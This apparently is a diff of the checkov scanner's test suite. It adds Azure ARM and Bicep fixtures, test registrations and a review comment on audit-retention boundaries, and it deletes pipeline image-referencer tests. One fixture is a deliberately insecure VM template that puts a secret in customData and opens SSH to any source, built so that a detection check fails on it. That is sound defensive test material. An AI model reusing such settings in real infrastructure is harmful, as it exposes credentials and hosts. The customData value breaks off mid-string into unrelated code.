"template": { + "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.DBforMySQL/flexibleServers/configurations", + "name": "[concat(parameters('serverName'),'/',variables('serverParameters')[copyIndex()].name)]", + "apiVersion": "[variables('api')]", + "properties": { + "value": "[variables('serverParameters')[copyIndex()].value]", + "source": "[variables('serverParameters')[copyIndex()].source]" + } + } + ] + } + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_VMCredsInCustomData/fail-secret.json b/tests/arm/checks/resource/example_VMCredsInCustomData/fail-secret.json new file mode 100644 index 00000000000..84ae9a641b8 --- /dev/null +++ b/tests/arm/checks/resource/example_VMCredsInCustomData/fail-secret.json 
@@ -0,0 +1,175 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.22.6.54827", + "templateHash": "1864719808904770163" + } + }, + "parameters": { + "dnsLabelPrefix": { + "type": "string", + "metadata": { + "description": "Unique DNS Name for the Public IP used to access the Virtual Machine." + } + }, + "adminUsername": { + "type": "string", + "metadata": { + "description": "User name for the Virtual Machine." + } + }, + "customData": { + "type": "string", + "defaultValue": "echo customData", + "metadata": { + "description": "String passed down to the Virtual Machine." + } + }, + "vmSize": { + "type": "string", + "defaultValue": "Standard_D2_v3", + "metadata": { + "description": "VM size" + } + }, + "ubuntuOSVersion": { + "type": "string", + "defaultValue": "18.04-LTS", + "allowedValues": [ + "14.04-LTS", + "16.04-LTS", + "18.04-LTS", + "20.04-LTS" + ], + "metadata": { + "description": "The Ubuntu version for the VM. This will pick a fully patched image of this given Ubuntu version. Allowed values: 14.04-LTS,16.04-LTS,18.04-LTS,20.04-LTS." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "authenticationType": { + "type": "string", + "defaultValue": "sshPublicKey", + "allowedValues": [ + "sshPublicKey", + "password" + ], + "metadata": { + "description": "Type of authentication to use on the Virtual Machine. SSH key is recommended." + } + }, + "adminPasswordOrKey": { + "type": "securestring", + "metadata": { + "description": "SSH Key or password for the Virtual Machine. SSH key is recommended." 
+ } + } + }, + "variables": { + "storageAccountName": "[format('{0}sacustmdata', uniqueString(resourceGroup().id))]", + "imagePublisher": "Canonical", + "imageOffer": "UbuntuServer", + "nicName": "networkInterface1", + "vmName": "vm1", + "virtualNetworkName": "virtualNetwork1", + "publicIPAddressName": "publicIp1", + "addressPrefix": "10.0.0.0/16", + "subnet1Name": "Subnet-1", + "subnet1Prefix": "10.0.0.0/24", + "publicIPAddressType": "Dynamic", + "storageAccountType": "Standard_LRS", + "linuxConfiguration": { + "disablePasswordAuthentication": true, + "ssh": { + "publicKeys": [ + { + "path": "[format('/home/{0}/.ssh/authorized_keys', parameters('adminUsername'))]", + "keyData": "[parameters('adminPasswordOrKey')]" + } + ] + } + }, + "networkSecurityGroupName": "default-NSG" + }, + "resources": [ + + { + "type": "Microsoft.Network/networkSecurityGroups", + "apiVersion": "2023-05-01", + "name": "[variables('networkSecurityGroupName')]", + "location": "[parameters('location')]", + "properties": { + "securityRules": [ + { + "name": "default-allow-22", + "properties": { + "priority": 1000, + "access": "Allow", + "direction": "Inbound", + "destinationPortRange": "22", + "protocol": "Tcp", + "sourceAddressPrefix": "*", + "sourcePortRange": "*", + "destinationAddressPrefix": "*" + } + } + ] + } + }, + + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2023-07-01", + "name": "fail-secret", + "location": "[parameters('location')]", + "properties": { + "hardwareProfile": { + "vmSize": "[parameters('vmSize')]" + }, + "osProfile": { + "computerName": "[variables('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": "[parameters('adminPasswordOrKey')]", + "customData": "< None: def test_AzureSpringCloudConfigWithVnet(self): self.go("AzureSpringCloudConfigWithVnet") + def test_AzureMLWorkspacePublicNetwork(self): + self.go("AzureMLWorkspacePublicNetwork") + def test_registry_load(self): registry = self.get_checks_registry() 
self.assertGreater(len(registry.checks), 0) diff --git a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml deleted file mode 100644 index 69138e5084c..00000000000 --- a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml +++ /dev/null @@ -1,45 +0,0 @@ -trigger: -- master - -resources: - repositories: - - repository: AzureDevOps - type: git - endpoint: AzureDevOps - name: AzureDevOps/AzureDevOps - -stages: -- stage: Example - jobs: - - job: FailNoTag - displayName: FailNoTagDisplayName - pool: - vmImage: 'ubuntu-18.04' - steps: - - task: Docker@2 - inputs: - container: postgres:14.2 - - - job: PassDigest - pool: - vmImage: 'ubuntu-18.04' - - container: nginx:1.17 - - steps: - - script: printenv - -jobs: -- job: MyJob - container: ruby:2.6 - pool: - vmImage: windows-latest - steps: - - script: echo "Running in a container based on myorg/mycontainer:1.0" -- job: MyJob2 - container: - image: ruby:2.6 - pool: - vmImage: ubuntu-latest - steps: - - script: echo "Running in a container based on ruby:2.6" \ No newline at end of file diff --git a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml deleted file mode 100644 index 7f54262b530..00000000000 --- a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml +++ /dev/null @@ -1,15 +0,0 @@ -trigger: -- master - -resources: - repositories: - - repository: AzureDevOps - type: git - endpoint: AzureDevOps - name: AzureDevOps/AzureDevOps - -jobs: -- job: PassTag - pool: - vmImage: 'ubuntu-18.04' - container: redis:latest \ No newline at end of file 
diff --git a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py b/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py deleted file mode 100644 index 15d932d1474..00000000000 --- a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py +++ /dev/null 
@@ -1,528 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider -from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager - - -def test_provider_extract_images_from_workflow(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 18 - }, - "steps": - [ - { - "task": "Docker@2", - "inputs": - { - "container": "postgres:14.2", - "__startline__": 21, - "__endline__": 23 - }, - "__startline__": 19, - "__endline__": 23 - } - ], - "__startline__": 14, - "__endline__": 23 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 25, - "__endline__": 27 - }, - "container": "nginx:1.17", - "steps": - [ - { - "script": "printenv", - "__startline__": 30, - "__endline__": 32 - } - ], - "__startline__": 23, - "__endline__": 32 - } - ], - "__startline__": 12, - "__endline__": 32 - } - ], - "jobs": - [ - { - "job": "MyJob", - "container": "ruby:2.6", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 36, - "__endline__": 37 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 38, - "__endline__": 39 - } - ], - "__startline__": 33, - "__endline__": 39 - }, - { - "job": "MyJob2", - "container": - { - "image": "ruby:2.6", - "__startline__": 41, - "__endline__": 42 - }, - "pool": - { - 
"vmImage": "ubuntu-latest", - "__startline__": 43, - "__endline__": 44 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on ruby:2.6\"", - "__startline__": 45, - "__endline__": 45 - } - ], - "__startline__": 39, - "__endline__": 45 - } - ], - "__startline__": 1, - "__endline__": 45 -} - - azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - images = azure_pipelines_provider.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=23, - start_line=21, - file_path=file_path, - name='postgres:14.2', - related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs' - ), - Image( - end_line=32, - start_line=23, - file_path=file_path, - name='nginx:1.17', - related_resource_id='stages[0](Example).jobs[1](PassDigest)' - ), - Image( - end_line=39, - start_line=33, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[0](MyJob)' - ), - Image( - end_line=45, - start_line=39, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[1](MyJob2)' - ) - } - -def test_provider_extract_images_from_workflow_no_images(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 19 - }, - "__startline__": 14, - "__endline__": 19 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 21, - "__endline__": 23 - }, - "steps": - [ - { - "script": "printenv", - 
"__startline__": 24, - "__endline__": 26 - } - ], - "__startline__": 19, - "__endline__": 26 - } - ], - "__startline__": 12, - "__endline__": 26 - } - ], - "jobs": - [ - { - "job": "MyJob", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 29, - "__endline__": 30 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 31, - "__endline__": 31 - } - ], - "__startline__": 27, - "__endline__": 31 - } - ], - "__startline__": 1, - "__endline__": 31 -} - - azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - images = azure_pipelines_provider.extract_images_from_workflow() - - assert not images - -def test_manager_extract_images_from_workflow(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 18 - }, - "steps": - [ - { - "task": "Docker@2", - "inputs": - { - "container": "postgres:14.2", - "__startline__": 21, - "__endline__": 23 - }, - "__startline__": 19, - "__endline__": 23 - } - ], - "__startline__": 14, - "__endline__": 23 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 25, - "__endline__": 27 - }, - "container": "nginx:1.17", - "steps": - [ - { - "script": "printenv", - "__startline__": 30, - "__endline__": 32 - } - ], - "__startline__": 23, - "__endline__": 32 - } - ], - "__startline__": 12, - "__endline__": 32 - } - ], - "jobs": - [ - { - "job": 
"MyJob", - "container": "ruby:2.6", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 36, - "__endline__": 37 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 38, - "__endline__": 39 - } - ], - "__startline__": 33, - "__endline__": 39 - }, - { - "job": "MyJob2", - "container": - { - "image": "ruby:2.6", - "__startline__": 41, - "__endline__": 42 - }, - "pool": - { - "vmImage": "ubuntu-latest", - "__startline__": 43, - "__endline__": 44 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on ruby:2.6\"", - "__startline__": 45, - "__endline__": 45 - } - ], - "__startline__": 39, - "__endline__": 45 - } - ], - "__startline__": 1, - "__endline__": 45 -} - - manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=23, - start_line=21, - file_path=file_path, - name='postgres:14.2', - related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs' - ), - Image( - end_line=32, - start_line=23, - file_path=file_path, - name='nginx:1.17', - related_resource_id='stages[0](Example).jobs[1](PassDigest)' - ), - Image( - end_line=39, - start_line=33, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[0](MyJob)' - ), - Image( - end_line=45, - start_line=39, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[1](MyJob2)' - ) - } - -def test_manager_extract_images_from_workflow_no_images(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, 
- "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 19 - }, - "__startline__": 14, - "__endline__": 19 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 21, - "__endline__": 23 - }, - "steps": - [ - { - "script": "printenv", - "__startline__": 24, - "__endline__": 26 - } - ], - "__startline__": 19, - "__endline__": 26 - } - ], - "__startline__": 12, - "__endline__": 26 - } - ], - "jobs": - [ - { - "job": "MyJob", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 29, - "__endline__": 30 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 31, - "__endline__": 31 - } - ], - "__startline__": 27, - "__endline__": 31 - } - ], - "__startline__": 1, - "__endline__": 31 -} - - manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/azure_pipelines/image_referencer/test_runner.py b/tests/azure_pipelines/image_referencer/test_runner.py deleted file mode 100644 index 57bd9faa3e6..00000000000 --- a/tests/azure_pipelines/image_referencer/test_runner.py +++ /dev/null 
@@ -1,57 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.azure_pipelines.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent / "resources/single_image" - - -def test_azure_pipelines_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - file_name = "azure-pipelines.yaml" - image_name = "redis:latest" - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - azure_pipelines_report = next(report for report in reports if report.check_type == CheckType.AZURE_PIPELINES) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(azure_pipelines_report.resources) == 0 - assert len(azure_pipelines_report.passed_checks) == 1 - assert len(azure_pipelines_report.failed_checks) == 2 - assert len(azure_pipelines_report.skipped_checks) == 0 - assert len(azure_pipelines_report.parsing_errors) == 0 - - - assert sca_image_report.image_cached_results[0]["dockerImageName"] == image_name - assert sca_image_report.image_cached_results[0]["packages"] == [ - {"type": "os", "name": "tzdata", "version": 
"2021a-1+deb11u5", "licenses": []} - ] - - assert len(sca_image_report.passed_checks) == 1 - assert len(sca_image_report.failed_checks) == 4 - assert len(sca_image_report.image_cached_results) == 1 - assert len(sca_image_report.skipped_checks) == 0 - assert len(sca_image_report.parsing_errors) == 0 diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/expected.yaml b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/expected.yaml new file mode 100644 index 00000000000..a4761b59575 --- /dev/null +++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/expected.yaml @@ -0,0 +1,10 @@ +pass: + - 'Microsoft.Sql/servers.sqlServer_pass' +fail: + - 'Microsoft.Sql/servers.sqlServer_fail1' + - 'Microsoft.Sql/servers.sqlServer_fail2' + - 'Microsoft.Sql/servers.sqlServer_fail3' +evaluated_keys: + - 'properties/retentionDays' + - 'properties/state' + - 'resource_type' \ No newline at end of file diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail1_less_90.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail1_less_90.bicep new file mode 100644 index 00000000000..cde4d44edb9 --- /dev/null +++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail1_less_90.bicep @@ -0,0 +1,15 @@ +resource sqlServer_fail1 'Microsoft.Sql/servers@2023-05-01-preview' = { + name: sqlServerName +} + +/// SQL Auditing + +resource sql_auditing_fail1 'Microsoft.Sql/servers/auditingSettings@2023-05-01-preview' = { + name: 'default' + parent: sqlServer_fail1 + properties: { + isAzureMonitorTargetEnabled: true + retentionDays: 67 + state: 'Enabled' + } +} diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail2_no_auditsettings.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail2_no_auditsettings.bicep new file mode 100644 index 00000000000..2e0aad4327f --- /dev/null 
+++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail2_no_auditsettings.bicep @@ -0,0 +1,5 @@ +resource sqlServer_fail2 'Microsoft.Sql/servers@2023-05-01-preview' = { + name: sqlServerName +} + +/// No SQL Audit Settings diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail3_not_enabled.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail3_not_enabled.bicep new file mode 100644 index 00000000000..9aa87f5660f --- /dev/null +++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail3_not_enabled.bicep @@ -0,0 +1,15 @@ +resource sqlServer_fail3 'Microsoft.Sql/servers@2023-05-01-preview' = { + name: sqlServerName +} + +/// SQL Auditing + +resource sql_auditing_fail3 'Microsoft.Sql/servers/auditingSettings@2023-05-01-preview' = { + name: 'default' + parent: sqlServer_fail3 + properties: { + isAzureMonitorTargetEnabled: true + retentionDays: 92 + state: 'Disabled' + } +} diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/pass1.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/pass1.bicep new file mode 100644 index 00000000000..43609aa52e5 --- /dev/null +++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/pass1.bicep @@ -0,0 +1,15 @@ +resource sqlServer_pass 'Microsoft.Sql/servers@2023-05-01-preview' = { + name: sqlServerName +} + +/// SQL Auditing + +resource sql_auditing_pass 'Microsoft.Sql/servers/auditingSettings@2023-05-01-preview' = { + name: 'default' + parent: sqlServer_pass + properties: { + isAzureMonitorTargetEnabled: true + retentionDays: 92 + state: 'Enabled' + } +} diff --git a/tests/bicep/graph/checks/test_yaml_policies.py b/tests/bicep/graph/checks/test_yaml_policies.py index 2d233683123..8824b5ec52b 100644 --- a/tests/bicep/graph/checks/test_yaml_policies.py +++ b/tests/bicep/graph/checks/test_yaml_policies.py 
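Review bot: The new fixtures never exercise the boundary the check is named for: retentionDays is 67 in fail1 and 92 in fail3/pass1, so whether exactly 90 passes or fails is left unpinned and a later off-by-one in the policy's comparison would go unnoticed. A fifth fixture with `retentionDays: 90` and `state: 'Enabled'`, listed in expected.yaml under whichever outcome the policy intends, would close that gap. One more case worth pinning: in Azure SQL auditingSettings a retentionDays of 0 means logs are retained indefinitely, so a policy that simply requires a value >= 90 would presumably flag the most conservative configuration as failing; the policy YAML itself is outside this diff, so confirm how it treats 0 before choosing the expected outcome.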
@@ -36,6 +36,9 @@ def setUp(self) -> None: def test_SQLServerAuditingEnabled(self): self.go("SQLServerAuditingEnabled") + def test_SQLServerAuditingRetention90Days(self): + self.go("SQLServerAuditingRetention90Days") + def test_registry_load(self): registry = self.get_checks_registry() self.assertGreater(len(registry.checks), 0) diff --git a/tests/circleci_pipelines/image_referencer/conftest.py b/tests/circleci_pipelines/image_referencer/conftest.py deleted file mode 100644 index e0fed1f5cd8..00000000000 --- a/tests/circleci_pipelines/image_referencer/conftest.py +++ /dev/null 
@@ -1,260 +0,0 @@ -from __future__ import annotations -import pytest - -from checkov.common.images.image_referencer import Image - - -@pytest.fixture -def file_path() -> str: - return ".circleci/config.yml" - - -@pytest.fixture -def circleci_config_with_images_definitions(file_path) -> dict: - return { - file_path: { - "orbs": { - "new-orb": "whatever/orbname@goodorb", - "some-orb": "orbs/orbname@dev:blah", - "__startline__": 6, - "__endline__": 9 - }, - "executors": { - "default-executor": { - "machine": { - "image": "windows-server-2022", - "__startline__": 12, - "__endline__": 14 - }, - "__startline__": 11, - "__endline__": 14 - }, - "image-executor": { - "docker": { - "image": "mongo:2.6.8", - "__startline__": 16, - "__endline__": 18 - }, - "__startline__": 15, - "__endline__": 18 - }, - "__startline__": 10, - "__endline__": 18 - }, - "jobs": { - "test-docker-versioned-img": { - "docker": [ - { - "image": "mongo:2.6.8", - "__startline__": 21, - "__endline__": 22 - } - ], - "steps": [ - "some-step" - ], - "__startline__": 20, - "__endline__": 25 - }, - "__startline__": 19, - "__endline__": 25 - }, - "__startline__": 5, - "__endline__": 25 - } - } - - -@pytest.fixture -def circle_ci_filepath_workflow_with_images_config(circleci_config_with_images_definitions, file_path) \ - -> tuple[str, dict]: - return file_path, circleci_config_with_images_definitions.get(file_path) - - -@pytest.fixture -def circleci_config_no_images_definitions(file_path) -> dict: - return { - file_path: { - "orbs": { - "new-orb": "whatever/orbname@goodorb", - "some-orb": "orbs/orbname@dev:blah", - "__startline__": 6, - "__endline__": 9 - }, - "executors": { - "default-executor": { - "machine": { - "image": "windows-server-2022", - "__startline__": 12, - "__endline__": 14 - }, - "__startline__": 11, - "__endline__": 14 - }, - "__startline__": 10, - "__endline__": 14 - }, - "jobs": { - "test-macos-image": { - "macos": { - "xcode": "9.4.1", - "__startline__": 17, - "__endline__": 18 - }, - 
"steps": [ - "some-step" - ], - "__startline__": 16, - "__endline__": 21 - }, - "test-machine-default": { - "executor": { - "name": "win/default-executor", - "__startline__": 23, - "__endline__": 24 - }, - "steps": [ - "some-step" - ], - "__startline__": 22, - "__endline__": 27 - }, - "__startline__": 15, - "__endline__": 27 - }, - "__startline__": 5, - "__endline__": 27 - } - } - - -@pytest.fixture -def circle_ci_filepath_workflow_no_images_config(circleci_config_no_images_definitions, file_path) -> tuple[str, dict]: - return file_path, circleci_config_no_images_definitions.get(file_path) - - -@pytest.fixture -def circle_ci_image1(file_path) -> Image: - image = Image( - end_line=18, - start_line=16, - name='mongo:2.6.8', - file_path=file_path, - related_resource_id='executors(image-executor).docker.image[1](mongo:2.6.8)', - ) - return image - - -@pytest.fixture -def circle_ci_image2(file_path) -> Image: - image = Image( - end_line=22, - start_line=21, - name='mongo:2.6.8', - file_path=file_path, - related_resource_id='jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)', - ) - return image - - -@pytest.fixture -def image_cached_result() -> dict: - return { - "results": [ - { - "id": "sha256:9dbc24674f25eb449df11179ed3717c47348fb3aa985ae14b3936d54c2c09dde", - "name": "postgres:14.2", - "distro": "Debian GNU/Linux 11 (bullseye)", - "distroRelease": "bullseye", - "digest": "sha256:2c954f8c5d03da58f8b82645b783b56c1135df17e650b186b296fa1bb71f9cfd", - "collections": [ - "All" - ], - "packages": [ - { - "type": "os", - "name": "base-files", - "version": "11.1+deb11u3", - "licenses": [ - "GPL" - ] - } - ], - "compliances": [], - "complianceDistribution": { - "critical": 0, - "high": 2, - "medium": 0, - "low": 0, - "total": 2 - }, - "complianceScanPassed": True, - "vulnerabilities": [ - ], - "vulnerabilityDistribution": { - "critical": 9, - "high": 26, - "medium": 8, - "low": 17, - "total": 60 - }, - "vulnerabilityScanPassed": True - } - ] - } - - -@pytest.fixture 
-def image_cached_results_for_report() -> tuple: - return ( - { - 'image_name': 'redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673', - 'related_resource_id': 'jobs(test-docker-hash-img).docker.image[1](redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'buildpack-deps:latest', - 'related_resource_id': 'jobs(test-docker-latest-img).docker.image[1](buildpack-deps:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'mongo:2.6.8', - 'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'postgres:14.2', - 'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[2](postgres:14.2)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-echo).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject2).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-curl-secret).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] 
- }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject-ci-vars).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'mongo:2.6.8', - 'related_resource_id': 'executors(image-executor).docker.image[1](mongo:2.6.8)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - } - ) diff --git a/tests/circleci_pipelines/image_referencer/test_manager.py b/tests/circleci_pipelines/image_referencer/test_manager.py deleted file mode 100644 index 92ab28b87e6..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_manager.py +++ /dev/null 
@@ -1,43 +0,0 @@ -from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager - - -def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config, - circle_ci_image1, circle_ci_image2): - file_path, config = circle_ci_filepath_workflow_with_images_config - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert set(images) == {circle_ci_image1, circle_ci_image2} - - -def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config): - file_path, config = circle_ci_filepath_workflow_no_images_config - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert not images - -def test_extract_images_from_workflow_nested(circle_ci_filepath_workflow_no_images_config): - file_path = '/tmp/test_path' - config = { - 'workspace_root': '/go/src/github.com/gruntwork-io/terragrunt', - 'defaults': { - 'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [ - {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11', - '__startline__': 6, '__endline__': 8}], '__startline__': 3, '__endline__': 8 - }, - 'jobs': { - 'install_dependencies': { - 'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [ - {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11', - '__startline__': 6, '__endline__': 8}], 'steps': ['checkout'], '__startline__': 11, '__endline__': 32 - } - }, '__startline__': 1, '__endline__': 143 - } - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert not images 
diff --git a/tests/circleci_pipelines/image_referencer/test_provider.py b/tests/circleci_pipelines/image_referencer/test_provider.py deleted file mode 100644 index 4f342a9000b..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_provider.py +++ /dev/null 
